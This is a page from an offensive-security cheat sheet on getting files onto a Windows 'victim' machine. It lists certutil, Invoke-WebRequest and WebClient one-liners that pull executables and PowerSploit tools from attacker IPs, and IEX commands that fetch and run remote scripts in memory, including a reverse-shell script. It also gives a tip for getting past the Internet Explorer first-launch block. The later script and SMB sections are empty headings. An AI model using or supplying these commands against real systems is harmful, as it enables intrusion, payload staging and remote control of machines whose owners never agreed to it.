Windows

Certutils

certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe

IWR (Invoke Web Request) 

powershell.exe Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

powershell.exe -command iwr -Uri http://192.168.1.2/putty.exe -OutFile C:\Temp\putty.exe "

System.Net.WebClient

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.2/putty.exe', 'putty.exe')

IEX

Instead of downloading to disk, the payload can instead be executed in memory, using Invoke-Expression, or the alias iex.

powershell.exe iex (New-Object Net.WebClient).DownloadString('http://192.168.119.193:8000/ps-sudo.ps1')

IEX also accepts pipeline input.

powershell Invoke-WebRequest http://10.10.16.26/rev.ps1 | iex

Internet Explorer Basic Parsing

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

This can be bypassed using the parameter -UseBasicParsing.

Escaping shell

If you ever encounter error regarding slash while supplying any of above command Incorrect syntax near '/'. Use / to escape it -

Script

  • if above command get blocked we can make ps script that will download our file

  • run following commands in victim :

Execution of script

SMB

Attacker -

Target -

PreviousLinuxNextCommand injection Cheatsheet

Last updated